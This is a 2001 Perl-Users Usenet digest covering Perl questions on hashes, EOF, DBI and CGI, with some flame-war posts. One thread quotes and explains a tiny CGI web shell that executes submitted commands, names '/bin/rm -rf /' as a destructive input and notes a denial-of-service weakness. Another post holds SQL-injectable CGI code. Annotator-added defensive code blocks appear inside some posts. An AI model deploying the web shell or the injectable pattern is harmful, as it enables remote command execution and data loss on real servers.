[19469] in Perl-Users-Digest


Perl-Users Digest, Issue: 1664 Volume: 10

daemon@ATHENA.MIT.EDU (Perl-Users Digest)
Fri Aug 31 03:05:32 2001

Date: Fri, 31 Aug 2001 00:05:14 -0700 (PDT)
From: Perl-Users Digest <Perl-Users-Request@ruby.OCE.ORST.EDU>
To: Perl-Users@ruby.OCE.ORST.EDU (Perl-Users Digest)
Message-Id: <999241513-v10-i1664@ruby.oce.orst.edu>
Content-Type: text

Perl-Users Digest           Fri, 31 Aug 2001     Volume: 10 Number: 1664

Today's topics:
    Re: 'filtering' a hash <goldbb2@earthlink.net>
        [OT]++ Attribution of Past Postings <jkline@one.net>
    Re: [OT]++ Attribution of Past Postings <godzilla@stomp.stomp.tokyo>
    Re: a mystery to me: EOF (Trewth Seeker)
    Re: arrays question <goldbb2@earthlink.net>
    Re: Can't locate misc.pl in @INC (Damian James)
        Closing a mssql database using mssql::sqllib <logix001@nospam.hotmail.com>
    Re: combining varibles <alexdgreen@hotmail.com>
    Re: Dangerous Perl Script? <wyzelli@yahoo.com>
    Re: Dangerous Perl Script? <godzilla@stomp.stomp.tokyo>
    Re: Dangerous Perl Script? <godzilla@stomp.stomp.tokyo>
    Re: Dangerous Perl Script? <wyzelli@yahoo.com>
    Re: Dangerous Perl Script? (Malcolm Dew-Jones)
    Re: Dangerous Perl Script? (Martien Verbruggen)
    Re: Dangerous Perl Script? <godzilla@stomp.stomp.tokyo>
    Re: DBI: Select statements that return results with con <goldbb2@earthlink.net>
    Re: Difference between .pl, .cgi, and .pm File Extensio (Tad McClellan)
    Re: Difference between .pl, .cgi, and .pm File Extensio (Trewth Seeker)
    Re: each() bug (?) (Bernard El-Hagin)
        Digest Administrivia (Last modified: 6 Apr 01) (Perl-Users-Digest Admin)

----------------------------------------------------------------------

Date: Thu, 30 Aug 2001 21:35:05 -0400
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: 'filtering' a hash
Message-Id: <3B8EE9C9.E2BF44C8@earthlink.net>

Abigail wrote:
> 
> Anne Janse (A.S.Janse@azu.nl) wrote on MMCMXIII September MCMXCIII in
> <URL:news:Pine.GSO.4.30.0108221304320.14748-100000@dizzy.azu.nl>:
> ## Hi all,
> ##
> ## I've got a hash %hash and an array @array
> ## and I'd like to make a new hash %newhash that contains only those
> ## $key-$value pairs from %hash of which there is no $key in @array.
> ##
> ## In other words, I'd like to throw away all $key-$value pairs
> ## from %hash of which $key is in @array.
> ##
> ## How can I do this? The problem doesn't look too hard, but my perl
> ## experience is quite limited..
> 
> Two ways:
> 
>     my %newhash = %hash;
>     delete @newhash {@array};
> 
>     my %temp = map {$_ => 1} @array;
>     my @temp = grep {!$temp {$_}} keys %hash;
>     my %newhash;
>     @newhash {@temp} = @hash {@temp};

Lots more than two:

my %newhash = map { $_ => $hash{$_} } grep {
	my $x = $_; !grep { $x eq $_ } @array
} keys %hash;

my (%temp, %newhash);
@temp{@array} = ();
foreach( grep !exists $temp{$_}, keys %hash ) {
	$newhash{$_} = $hash{$_};
}

my (%temp, %newhash);
@temp{@array} = ();
while( my( $key, $val ) = each %hash ) {
	$newhash{$key} = $val if !exists $temp{$key};
}

I prefer the each() solution, especially if %hash is very big.

-- 
"I think not," said Descartes, and promptly disappeared.


------------------------------

Date: Fri, 31 Aug 2001 02:14:09 -0400
From: Joe Kline <jkline@one.net>
Subject: [OT]++ Attribution of Past Postings
Message-Id: <3B8F2B31.8F3D0068@one.net>

"Godzilla!" wrote:

> <SNIP>
> other racist events here on the internet. This first incident,
> is, of course, your posting of near two pages of vile, vulgar
> and vehement racial slurs, under your fake name, Joe Kline.

Ahem. I posted that misguided attempt at satire.

Please try to properly attribute the sources you cite.

joe



------------------------------

Date: Thu, 30 Aug 2001 23:36:06 -0700
From: "Godzilla!" <godzilla@stomp.stomp.tokyo>
Subject: Re: [OT]++ Attribution of Past Postings
Message-Id: <3B8F3056.7566E38E@stomp.stomp.tokyo>

Joe Kline wrote:
 
> Godzilla! wrote:
 
> > <SNIP>
> > other racist events here on the internet. This first incident,
> > is, of course, your posting of near two pages of vile, vulgar
> > and vehement racial slurs, under your fake name, Joe Kline.
 
> Ahem. I posted that misguided attempt at satire.
 
> Please try to properly attribute the sources you cite.
 

NNTP-Posting-Host: 206.125.69.82
Date: 7 Feb 2000 18:31:51 -0800


Well goodness, look who suddenly shows up after an
absence of going on two years. If it isn't the racist
himself, still deep in denial. What a coincidence,
this very day no less.

You are not a very bright boy. You played right into my hand.

Being the CLPM Troll pales compared to being a known racist.
Nervous about being labeled this vile racist you are, Frank?


Godzilla!


------------------------------

Date: 30 Aug 2001 21:49:29 -0700
From: trewth_seeker@yahoo.com (Trewth Seeker)
Subject: Re: a mystery to me: EOF
Message-Id: <d690a633.0108302049.788b8c32@posting.google.com>

ziegler@algorilla.de (Joachim Ziegler) wrote in message news:<93aad7d0.0108300439.1844dabb@posting.google.com>...
> hi perlers,
> 
> reading the documentation of Perl's eof(), i'm wondering what EOF
> really is.

It's a condition that indicates that there's nothing more to read.
Programming is about abstractions; reality isn't relevant. :-)

> pressing CTRL-D on my keyboard is said to generate an
> "end-of-file-character". so is this a legal ASCII-character? 

ctrl-D is interpreted by the tty driver as meaning "end of file";
that causes the system to return the characters already typed
to the caller.  For instance, if you type abc^D the program
that did a read call gets "abc" in its buffer and a return value
of 3.  That doesn't seem to have much to do with "end of file",
does it?  Well, if you type ^D at the beginning of the line,
*no* characters go in the buffer and read() returns 0.  0 from
read() always means "end of file".

> (btw, how do i generate this character by a keyboard-stroke under
> Windows?)

It depends on what program is reading the keyboard.  If it is some
unix emulator like cygwin, ^D will be recognized as end-of-file.
But standard Windows programs recognize ^Z instead.
 
> i can't find it in my ASCII-table, because it does not show the
> non-printable characters. can someone please point me to a complete table?

Go to www.google.com and learn how to search for things; that
will serve you far better than asking specific questions.
 
> i'm conjecturing the following:
> 
> the EOF-character is *not* the last character of any file, right?

Not on sensible systems, but MSDOS actually recognizes ^Z in
a file as indicating the end -- this has to do with early
versions not storing the actual length of the file anywhere.
*That* is how sensible systems do it -- they know how long
the file is, and thus which is the last character in the file.

> the EOF returned by C's getc() is *not* the same as the above
> character generated by a keyboard-stroke, but a symbolic constant
> (usually negative) returned by this function to indicate, that there
> are no more characters left in a file/stream... right?

Right.  If you type ^D on the keyboard, your C program will get
EOF returned from getc(), but the relationship is not anything
so direct as ^D being converted into EOF.

> but internally, where does getc() know from that the stream is empty? 
> it's system-dependent, right?

Right.  For terminals, it's the fact that you typed ^D.  For files,
it's the fact that the file length stored on the disk says that's
where the file ends.  For magnetic tape, it's a special pattern
of magnetization that the hardware senses and informs the tape
driver and the tape driver represents to higher software levels
as "end-of-file".  It's all symbolic, abstract manipulations.
 
> the last line read by a <FILEHANDLE>-construct in Perl does *never*
> contain any special EOF-character at the end, right?

Is that a trick question?  :-)  The file could contain any character
as the last character, including ^D or ^Z.  It's all a matter
of how it's interpreted.  But for all practical purposes, from the
POV of the program there is no such thing as an EOF-character,
just eof as a condition.


------------------------------

Date: Fri, 31 Aug 2001 02:02:37 -0400
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: arrays question
Message-Id: <3B8F287D.757B0E32@earthlink.net>

Tad McClellan wrote:
> 
> Calin Guga <CalinG@cfgroup.ca> wrote:
> >
> >    How could I place 2(for ex. @numbers and @dates) or more arrays
> > together in a file, array 1 items would go on first row, array 2
> > items would go on second, etc. separated by comma, consecutively?
> 
>    { local $" = ',';
>      die "Barf! Commas in the data fields!\n"
>        if grep /,/, @numbers, @dates;
>      print FILE "@numbers\n";
>      print FILE "@dates\n";
>    }

Unless perl has a magical optimization I don't know of, this first
stringifies and joins, then prints.  ISTM it would be better to have
print itself do the stringifying and inserting of commas.


   { die "Barf! Commas in the data fields!\n"
       if grep /,/, @numbers, @dates;
     my $sel = select(FILE);
     local $, = ',';
     print @numbers; print "\n";
     print @dates  ; print "\n";
     select($sel);
   }

-- 
"I think not," said Descartes, and promptly disappeared.


------------------------------

Date: 31 Aug 2001 01:29:14 GMT
From: damian@qimr.edu.au (Damian James)
Subject: Re: Can't locate misc.pl in @INC
Message-Id: <slrn9otq0f.id1.damian@puma.qimr.edu.au>

Michael Ditum chose Thu, 30 Aug 2001 17:29:38 +0100 to say this:
>...
>i know its not in any of the stated paths as its held in
>c:\inetpub\wwwroot\cgi-bin\time_keeping.
>it doesn't seem to be checking the current working directory and i can't
>work out how to change it.
>
>any help would be greatly appreciated!
>

%perldoc -q library

	Found in /usr/local/lib/perl5/5.00503/pod/perlfaq8.pod
	How do I keep my own module/library directory?
	...
	How do I add the directory my program lives in to the module/library
	search path?

Cheers,
Damian
-- 
@:=grep!($;+=m!$/|#!),split//,<DATA>;@;=0..$#:;while(@;){for($;=@;;--$;;)
{@;[$;,$:]=@;[$:,$;]if($:=rand$;+$|)!=$;}push@|,shift@;if$;[0]==@|;select
$,,$,,$,,1/80;print qq x\bxx((@;+@|)*$|++),@:[@|,@;],!@;&&$/} __END__
Just another Perl Hacker # rev 3.1 -- a JAPH in progress, I guess...


------------------------------

Date: Fri, 31 Aug 2001 06:42:58 GMT
From: "Logix" <logix001@nospam.hotmail.com>
Subject: Closing a mssql database using mssql::sqllib
Message-Id: <SlGj7.28457$6x5.5961366@afrodite.telenet-ops.be>


Hello!

I'm having troubles closing my mssql db using the script below. When I don't
close them perl just takes the first database I open to execute every query
on. When I use the script below (this is with dbclose) the script stalls
when it has to execute the second query. Do you have any solutions?

Thx anyway

Logix

This is the code:

#!/usr/bin/perl

use MSSQL::Sqllib;

# create a UID
srand(time);
$uid = int(rand(1000000));
print "Set-Cookie: NAME=$uid\n";

# read in the submitted parameters
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs)
{
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}

# store the submitted parameters
$conn1 = sql_init("bnbeluiwkaho2", "sa", "", "TEST");
@a = sql("insert into Users values
('$uid','$FORM{'username'}','$FORM{'password'}','$FORM{'server'}','')");
$conn1 ->dbclose;

# HTML text
print "Content-type: text/html\n\n";
print <<END;
<html>
<head>
<title>Display a database using perl</title>
</head>
<body bgcolor=\"#ffff66\">
<H1><font face=\"Comic Sans MS\"><u>You are now logged on as
\"$FORM{'username'}\" at \"$FORM{'server'}\"</u></font></H1>
<HR>
<font face=\"Comic Sans MS\">You have been assigned UID \"$uid\" and this is
stored in a cookie on your browser</font><BR><BR>
<font face=\"Comic Sans MS\">Which database would you like to use?</font>
END

# Log into the server.
$conn2 = sql_init("$FORM{'server'}", "$FORM{'username'}",
"$FORM{'password'}", "master");

# Run a query.
@x = sql("exec sp_databases");
$conn2 ->dbclose;

# print the available databases
print "<FORM METHOD=POST ACTION=\'show_table.pl\'>";
print "<select name=\"Databases\">";

foreach $x (@x) {
 print "<option value=\"$$x{'DATABASE_NAME'}\">$$x{'DATABASE_NAME'}";
        }
print "</select>";
print "<INPUT TYPE=SUBMIT VALUE=\"GO!\">";
print "</FORM>\n</BODY>\n</HTML>";




------------------------------

Date: Fri, 31 Aug 2001 08:08:37 +0200
From: "Alex Green" <alexdgreen@hotmail.com>
Subject: Re: combining varibles
Message-Id: <9mn9l6$2u86t$1@ID-106172.news.dfncis.de>

Thanks, that did the trick.  Cheers for the help.

"Craig Berry" <cberry@cinenet.net> wrote in message
news:Xns910D7BF3E21EEcberrycinenetnet1@207.126.101.92...
> "Alex Green" <alexdgreen@hotmail.com> wrote in
> news:9mljba$2r1m3$1@ID-106172.news.dfncis.de:
> > Right well basically I have a perl/cgi script retreiving values from an
> > html form, with a first name and a last name field and what I need is
> > these to vars, lets say $fn and $ln to become combined to become
> > $owner.
>
>   $owner = "$fn $ln";    # Assuming you want a space between them;
>                          # leave it out if not, or use
>   $owner = $fn . $ln;    # instead.
>
> > Not really sure whether combine is the right word,
>
> Usually 'concatenate' is used for this string-combining operation. 'String
> interpolation' describes my first proposed method above.
>
> > but basically I need
> > to be able to print them as an entire text string.  Does that make
> > sense?
>
> If all you want to do is print them, then there's no need to build a
> separate variable to hold a concatenated form; just print them both as you'd
> like them to be combined in the output.
>
>   print "$fn $ln";
>
> --
> Craig Berry <http://www.cinenet.net/~cberry/>
> "That which is now known, was once only imagined." - William Blake
>




------------------------------

Date: Fri, 31 Aug 2001 14:43:23 +0930
From: "Wyzelli" <wyzelli@yahoo.com>
Subject: Re: Dangerous Perl Script?
Message-Id: <7YEj7.22$ju4.1114@wa.nnrp.telstra.net>

"Martien Verbruggen" <mgjv@tradingpost.com.au> wrote in message
news:slrn9ou5fi.2rs.mgjv@verbruggen.comdyn.com.au...
> On Fri, 31 Aug 2001 04:31:16 GMT,
> What A Man ! <whataman@home.com> wrote:
> > I'm told the below script is dangerous. It just looks like a bunch of
> > regexs to me. Can someone explain what it does?
> >
> > #!/usr/bin/perl
>
> no -w, no -T.
> no strict
>
> Very dangerous :)
>
> >    print "Content-type: text/html\n\n";
> >    if ( $ENV{'CONTENT_LENGTH'} )

> >        read(STDIN,$_,$ENV{'CONTENT_LENGTH'});
> >        s/(.)*=//; s/\+/ /g; s/%(..)/pack("c",hex($1))/ge;
> >        $out=`$_ 2>&1`; print "\%: $_<PRE>$out</PRE>"; }
> > print "<FORM METHOD=POST>
> ><INPUT TYPE=\"TEXT\" NAME=\"text\" SIZE=60 MAXLENGTH=300>
> ><INPUT TYPE=\"SUBMIT\" VALUE=\"Ok\"></FORM>";
>
> If run as a CGI program, It more or less executes whatever is
> submitted to it in a post. it doesn't do a particularly good job at
> decoding its input, but if you type something like (but do not try
> this!)
>
> /bin/rm -rf /
>
> in the form that it pops up, it'll destroy as many files on the hosts
> file systems as the user it runs as is allowed to (providing it's
> running on some Unix-like OS).
>
> Not a good program at all.

In addition, if you submit a 200Mb POST, then your server will continue to
read data, allocating more and more RAM to your process, and then possibly
swap, until maybe it eventually grinds to a halt.  This is a form of DoS
attack, to which this script is vulnerable.

CGI.pm on the other hand has built in limits (configurable) of how large a
POST to accept, after which it errors and dumps the connection.

Wyzelli
--
($a,$b,$w,$t)=(' bottle',' of beer',' on the wall','Take one down, pass it
around');
for(reverse(1..100)){$s=($_!=1)?'s':'';$c.="$_$a$s$b$w\n$_$a$s$b\n$t\n";
$_--;$s=($_!=1)?'s':'';$c.="$_$a$s$b$w\n\n";}print"$c*hic*";





------------------------------

Date: Thu, 30 Aug 2001 22:31:34 -0700
From: "Godzilla!" <godzilla@stomp.stomp.tokyo>
Subject: Re: Dangerous Perl Script?
Message-Id: <3B8F2136.C581B05D@stomp.stomp.tokyo>

Martien Verbruggen wrote:

>   What A Man ! wrote:

(snipped)

> > I'm told the below script is dangerous. It just looks like a bunch of
> > regexs to me. Can someone explain what it does?

> > #!/usr/bin/perl
 
> no -w, no -T.
> no strict
 
> Very dangerous :)

 
Your advice is even more dangerous. You are indicating
use of warnings, strict and taint will assure adequate
security. Warnings and strict serve little, if any,
purpose for security. Taint, at best, is very weak
security; it is full of security holes.

This type of inappropriate advice you provide, is
highly irresponsible and a reflection of your having
poor Perl programming skills.


Godzilla!


------------------------------

Date: Thu, 30 Aug 2001 22:43:24 -0700
From: "Godzilla!" <godzilla@stomp.stomp.tokyo>
Subject: Re: Dangerous Perl Script?
Message-Id: <3B8F23FC.319832B4@stomp.stomp.tokyo>

Wyzelli wrote:

> Martien Verbruggen wrote:
> > What A Man ! wrote:

(snipped)

> > > I'm told the below script is dangerous. It just looks like a bunch of
> > > regexs to me. Can someone explain what it does?

> In addition, if you submit a 200Mb POST, then your server will continue to
> read data, allocating more and more RAM to your process, and then possibly
> swap, until maybe it eventually grinds to a halt.  This is a form of DOS
> attack, to which this script is vulnerable.
 
> CGI.pm on the other hand has built in limits (configurable) of how large a
> POST to accept, after which it errors and dumps the connection.


Yours is Perl 5 Cargo Cultism Dogma. Either method can be easily
configured to limit Content Length. You are inferring a custom
read and parse cannot be configured to limit input length.

    if ($ENV{'CONTENT_LENGTH'} > 131072)
     { &Aiyaka; }

My subroutine Aiyaka is rather creative in what it does.


A reader will be well advised to research both methods of reading
and parsing form data input. A custom read and parse is almost
always exceptionally faster, exceptionally more efficient and
certainly more configurable than CGI.pm. Each method has benefits
and detriments. These should be weighed based upon unique needs
after careful research and reading.


Godzilla!
--

#!perl

print "Content-type: text/plain\n\n";

use Benchmark;

print "Run One:\n\n";
&Time;

print "\n\nRun Two:\n\n";
&Time;

print "\n\nRun Three:\n\n";
&Time;


sub Time
 {
  timethese (100000,
  {
   'name1' =>
   '$ENV{QUERY_STRING} = "north=north&south=south&east=east&west=west";
    $buffer = $ENV{QUERY_STRING};
    @checks = split(/&/, $buffer);
    foreach $check (@checks)
     {
      ($name, $value) = split(/=/, $check);
      $value =~ tr/+/ /;
      $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
      $FORM{$name} = $value;
     }
    $north = "$FORM{north}";
    $south = "$FORM{south}";
    $east = "$FORM{east}";
    $west = "$FORM{west}";',

   'name2' =>
   '$ENV{QUERY_STRING} = "north=north&south=south&east=east&west=west";
    use CGI;
    my $query = new CGI;
    $north = $query->param(north);
    $south = $query->param(south);
    $east = $query->param(east);
    $west = $query->param(west);',

  } );
 }

PRINTED RESULTS:
________________

Run One:

Benchmark: timing 100000 iterations of name1, name2...
 name1:  8 wallclock secs ( 8.46 usr +  0.00 sys =  8.46 CPU) @ 11820.33/s
 name2: 127 wallclock secs (126.32 usr +  0.00 sys = 126.32 CPU) @ 791.64/s


Run Two:

Benchmark: timing 100000 iterations of name1, name2...
 name1:  9 wallclock secs ( 8.79 usr +  0.00 sys =  8.79 CPU) @ 11376.56/s
 name2: 127 wallclock secs (126.49 usr +  0.00 sys = 126.49 CPU) @ 790.58/s


Run Three:

Benchmark: timing 100000 iterations of name1, name2...
 name1:  8 wallclock secs ( 8.68 usr +  0.00 sys =  8.68 CPU) @ 11520.74/s
 name2: 125 wallclock secs (126.27 usr +  0.00 sys = 126.27 CPU) @ 791.95/s


------------------------------

Date: Fri, 31 Aug 2001 15:50:01 +0930
From: "Wyzelli" <wyzelli@yahoo.com>
Subject: Re: Dangerous Perl Script?
Message-Id: <BWFj7.23$ju4.1120@wa.nnrp.telstra.net>

"Godzilla!" <godzilla@stomp.stomp.tokyo> wrote in message
news:3B8F23FC.319832B4@stomp.stomp.tokyo...
>
> Yours is Perl 5 Cargo Cultism Dogma. Either method can be easily
> configured to limit Content Length. You are inferring a custom
> read and parse cannot be configured to limit input length.

I made no such implication.  You inferred that I did.  You don't even know
what infer means.

>     if ($ENV{'CONTENT_LENGTH'} > 131072)
>      { &Aiyaka; }
>
> My subroutine Aiyaka is rather creative in what it does.

Snip of code

Whilst it would be expected that direct coding would run significantly
faster than CGI.pm, and that would never be disputed, even on your computer
the difference as perceived by the end-user of a web page is so small as to
be invisible.  By that I mean the run time of a single instance of your
example is in the order of 1.27 milliseconds, and the user's browser and
Internet connection would normally take up to a second to process the entire
transaction (on a fast connection) so the saving in script time is
insignificant in the scheme of things, compared to the potential saving of
hours of development and debugging time.

Even with 100,000 hits on this script, you would only save 119 seconds of
run time, over a period of 'however long it takes to do 100,000 hits'.

This is an example of spending a lot of time and effort for little real (not
imagined) advantage.

This is a reason to use modules.

This is a reason to not re-invent the wheel.

Wyzelli
--
push@x,$_ for(a..z);push@x,' ';
@z='092018192600131419070417261504171126070002100417'=~/(..)/g;
foreach $y(@z){$_.=$x[$y]}y/jp/JP/;print;




------------------------------

Date: 30 Aug 2001 23:30:09 -0800
From: yf110@vtn1.victoria.tc.ca (Malcolm Dew-Jones)
Subject: Re: Dangerous Perl Script?
Message-Id: <3b8f2ef1@news.victoria.tc.ca>

Wyzelli (wyzelli@yahoo.com) wrote:

: In addition, if you submit a 200Mb POST, then your server will continue to
: read data, allocating more and more RAM to your process, and then possibly
: swap, until maybe it eventually grinds to a halt.  This is a form of DOS
: attack, to which this script is vulnerable.

: CGI.pm on the other hand has built in limits (configurable) of how large a
: POST to accept, after which it errors and dumps the connection.

Yes, but last time I checked, CGI.pm has no *default* limit, so virtually
all cgi scripts that use CGI.pm are vulnerable to the attack. 
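An added example (my code, not any poster's) that puts the three points of this sub-thread together: Wyzelli's unbounded read(STDIN, ..., CONTENT_LENGTH), Godzilla's check of CONTENT_LENGTH against a ceiling before reading a byte, and Malcolm Dew-Jones's note that CGI.pm enforces no limit until you set one. `read_form`, `parse_query` and `MAX_POST` are names I chose; `$CGI::POST_MAX` is CGI.pm's real knob (not mentioned on the page) and appears only in a comment.

```perl
#!/usr/bin/perl
use strict;
use warnings;

use constant MAX_POST => 131_072;   # the 128 KiB ceiling used in the thread

# Reads at most MAX_POST bytes of an application/x-www-form-urlencoded body
# from $fh and returns the decoded fields as a hashref. Dies before reading
# anything if the client-supplied length is missing, non-numeric or over the
# ceiling, and dies if the body turns out shorter than declared.
sub read_form {
    my ($fh, $declared_len) = @_;
    die "missing or non-numeric CONTENT_LENGTH\n"
        unless defined $declared_len && $declared_len =~ /\A\d+\z/;
    die "request body of $declared_len bytes exceeds limit of @{[MAX_POST]}\n"
        if $declared_len > MAX_POST;

    my $buffer = '';
    while (length($buffer) < $declared_len) {
        # read() may return fewer bytes than asked for; loop, but never ask
        # for more than the (already bounded) remainder.
        my $got = read($fh, $buffer, $declared_len - length($buffer), length($buffer));
        die "read failed: $!\n" unless defined $got;
        last if $got == 0;                      # EOF before the declared length
    }
    die "short body: got @{[length $buffer]} of $declared_len bytes\n"
        if length($buffer) != $declared_len;
    return parse_query($buffer);
}

# Decodes name=value pairs: '+' becomes a space, %XX becomes a byte. Both the
# name and the value are decoded (the thread's one-liners decode only the value).
sub parse_query {
    my ($query) = @_;
    my %form;
    for my $pair (split /&/, $query) {
        my ($name, $value) = split /=/, $pair, 2;
        next unless defined $name && length $name;
        $value = '' unless defined $value;
        for ($name, $value) {
            tr/+/ /;
            s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
        }
        $form{$name} = $value;
    }
    return \%form;
}

# The CGI.pm equivalent of the same ceiling. The module's default is "no
# limit", so this must be set explicitly, before the CGI object is created:
#   $CGI::POST_MAX = MAX_POST;

# Demo on a constructed request body, so it runs offline without a web server.
if (!caller) {
    my $body = 'user=alice&note=hello%2C+world';   # constructed sample POST body
    open my $fh, '<', \$body or die $!;
    my $form = read_form($fh, length $body);
    print "$_ => $form->{$_}\n" for sort keys %$form;

    # A client claiming a 200 MB body is refused before any memory is allocated.
    open $fh, '<', \$body or die $!;
    eval { read_form($fh, 200 * 1024 * 1024) };
    print "rejected: $@";
}
```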



------------------------------

Date: Fri, 31 Aug 2001 04:43:30 GMT
From: mgjv@tradingpost.com.au (Martien Verbruggen)
Subject: Re: Dangerous Perl Script?
Message-Id: <slrn9ou5fi.2rs.mgjv@verbruggen.comdyn.com.au>

On Fri, 31 Aug 2001 04:31:16 GMT,
	What A Man ! <whataman@home.com> wrote:
> I'm told the below script is dangerous. It just looks like a bunch of
> regexs to me. Can someone explain what it does?
> 
> #!/usr/bin/perl 

no -w, no -T.
no strict

Very dangerous :)

>    print "Content-type: text/html\n\n"; 
>    if ( $ENV{'CONTENT_LENGTH'} ) { 
>        read(STDIN,$_,$ENV{'CONTENT_LENGTH'}); 
>        s/(.)*=//; s/\+/ /g; s/%(..)/pack("c",hex($1))/ge; 
>        $out=`$_ 2>&1`; print "\%: $_<PRE>$out</PRE>"; } 
> print "<FORM METHOD=POST> 
><INPUT TYPE=\"TEXT\" NAME=\"text\" SIZE=60 MAXLENGTH=300>
><INPUT TYPE=\"SUBMIT\" VALUE=\"Ok\"></FORM>";

If run as a CGI program, it more or less executes whatever is
submitted to it in a post. It doesn't do a particularly good job at
decoding its input, but if you type something like (but do not try
this!)

/bin/rm -rf /

in the form that it pops up, it'll destroy as many files on the host's
file systems as the user it runs as is allowed to (providing it's
running on some Unix-like OS).

Not a good program at all.

Martien
-- 
Martien Verbruggen                      |
Interactive Media Division              | "In a world without fences,
Commercial Dynamics Pty. Ltd.           |  who needs Gates?"
NSW, Australia                          |


------------------------------

Date: Thu, 30 Aug 2001 23:59:51 -0700
From: "Godzilla!" <godzilla@stomp.stomp.tokyo>
Subject: Re: Dangerous Perl Script?
Message-Id: <3B8F35E7.762DD82B@stomp.stomp.tokyo>

Wyzelli wrote:
 
> Godzilla! wrote:

> > Yours is Perl 5 Cargo Cultism Dogma. Either method can be easily
> > configured to limit Content Length. You are inferring a custom
> > read and parse cannot be configured to limit input length.
 
 

> Whilst it would be expected that direct coding would run significantly
> faster that CGI.pm, and that would never be disputed, even on your computer
> the difference as perceived by the end-user of a web page is so small as to
> be invisible.  By that I mean the run time of a single instance of your
> example is in the order of 1.27 milliseconds,

You have made a presumption that benchmark results, and event times
in general, can be linearly extrapolated. This is a display of
how little you know about good Scientific Method and how
little you know about Mathematical calculations.



> Even with 100,000 hits on this script, you would only save 119 seconds of
> run time, over a period of 'however long it takes to do 100,000 hits'.

How ironic. Last year you and many others ragged on me for a week
claiming examples of sites experiencing millions of hits per day
and how important it is to optimize code to the max.

Today you are claiming just the opposite.

Clearly you don't walk the talk, like I do. You make up
this mule manure at your ego's command.

 
> This is an example of spending a lot of time and effort for little real (not
> imagined) advantage.

Oh my, you selectively forgot to mention this severe memory bloat
factor of CGI.pm, accounting, in large part, for its snail pace.
 
> This is a reason to use modules.

This is ego mule manure.
 
> This is a reason to not re-invent the wheel.

This is ego mule manure.


Godzilla!  Queen Of Imaginative Wheels.
--
  http://la.znet.com/~callgirl/wheel.gif


------------------------------

Date: Fri, 31 Aug 2001 02:15:34 -0400
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: DBI: Select statements that return results with control characters
Message-Id: <3B8F2B86.A6845237@earthlink.net>

Ben Holness wrote:
> 
> Hi all,
> 
> I am running a relatively simple perl script that includes the
> following lines, located within a loop that increments $ID:
> 
> $stmt="SELECT name, description FROM info WHERE id='$ID'";
> @array=$dbh->selectrow_array($stmt);
> if (!($dbh->errstr))
> {
>     print "Results - Name: @array[0], \nDescription: \n@array[1]\n";
> }
> 
> This works for some of the records in the database, but a number of
> them have carriage returns (and possibly other control characters) in
> the description field. When one of these records is encounted, both
> Name and Description become empty.

There's no reason for it to work with some but not others as you
describe, IF they got into the database correctly.  Are you sure that
the items you're speaking of are actually in the database?

> How can I extract description, preserving the control characters?
> (i.e. when it prints I want the formatting to be retained)

The problem isn't formatting being lost on extraction, it's that you did
something funky when you put it in [like for example interpolating the
data into the statement rather than using placeholders].

Assuming your insert was done as follows:
while( <DATA> ) {
	my( $name, $desc, $id ) = split;
	$dbh->do( qq[
		INSERT INTO tablename VALUES ('$name', '$desc', '$id')
	] );
}

Replace it with:
my $insert = $dbh->prepare( q[INSERT INTO tablename VALUES (?, ?, ?)] );
while( <DATA> ) {
	my( $name, $desc, $id ) = split;
	$insert->execute($name, $desc, $id);
}

See how the placeholders work?

And your retrieval to be like:
my $fetch = $dbh->prepare( q[
	SELECT name, description
	FROM tablename
	WHERE id >= ? AND id <= ?
] );
$fetch->execute( $minid, $maxid );
while( my ($name, $desc) = $fetch->fetchrow_array ) {
    print "Results - Name: $name, \nDescription: \n$desc\n";
}

-- 
"I think not," said Descartes, and promptly disappeared.
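An added, runnable version of the point above (my code, not Benjamin Goldberg's): with an in-memory DBD::SQLite database (assumed installed) it shows that a description holding a newline and an apostrophe is rejected by the interpolated INSERT and round-trips intact through placeholders. The table `info` and its columns come from the original question; the record and the sub names are constructed.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use DBI;

# Constructed record: a description with an embedded newline and an
# apostrophe, the kind of data that breaks an interpolated statement.
my %rec = (id => 1, name => 'widget', description => "line one\nit's line two");

# Field values are spliced into the SQL text. The apostrophe in the
# description closes the string literal early, so the statement fails
# (and, with hostile input, could have done something else entirely).
sub insert_interpolated {
    my ($dbh, $r) = @_;
    my $ok = eval {
        $dbh->do("INSERT INTO info VALUES ('$r->{id}', '$r->{name}', '$r->{description}')");
        1;
    };
    return $ok ? 'ok' : "failed: $@";
}

# The values travel as bind parameters and never touch the SQL text, so
# quotes, newlines and other control characters are stored verbatim.
sub insert_placeholders {
    my ($dbh, $r) = @_;
    my $sth = $dbh->prepare('INSERT INTO info (id, name, description) VALUES (?, ?, ?)');
    $sth->execute($r->{id}, $r->{name}, $r->{description});
    return 'ok';
}

# Retrieval with a placeholder too; returns the stored description.
sub fetch_description {
    my ($dbh, $id) = @_;
    my ($desc) = $dbh->selectrow_array(
        'SELECT description FROM info WHERE id = ?', undef, $id);
    return $desc;
}

my $dbh = DBI->connect('dbi:SQLite:dbname=:memory:', '', '',
                       { RaiseError => 1, PrintError => 0 });
$dbh->do('CREATE TABLE info (id INTEGER PRIMARY KEY, name TEXT, description TEXT)');

print "interpolated: ", insert_interpolated($dbh, \%rec), "\n";
print "placeholders: ", insert_placeholders($dbh, \%rec), "\n";

my $back = fetch_description($dbh, $rec{id});
print "round trip ", ($back eq $rec{description} ? 'preserved' : 'lost'),
      " the control characters\n";
$dbh->disconnect;
```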


------------------------------

Date: Thu, 30 Aug 2001 22:23:18 -0400
From: tadmc@augustmail.com (Tad McClellan)
Subject: Re: Difference between .pl, .cgi, and .pm File Extensions.
Message-Id: <slrn9ott8m.1lq.tadmc@tadmc26.august.net>


[ Please put your comments *following* the quoted text that
  you are commenting on.

  Thank you.
]


Bob Holden <bob@eawf.nospam.com> wrote:
>On Thu, 30 Aug 2001 14:57:13 -0400, brian d foy <comdog@panix.com>
>wrote:
>
>>In article <h1usotogbc2s5vrftjvmf2r6s1cqe53k94@4ax.com>, 
>>bob@eawf.nospam.com wrote:
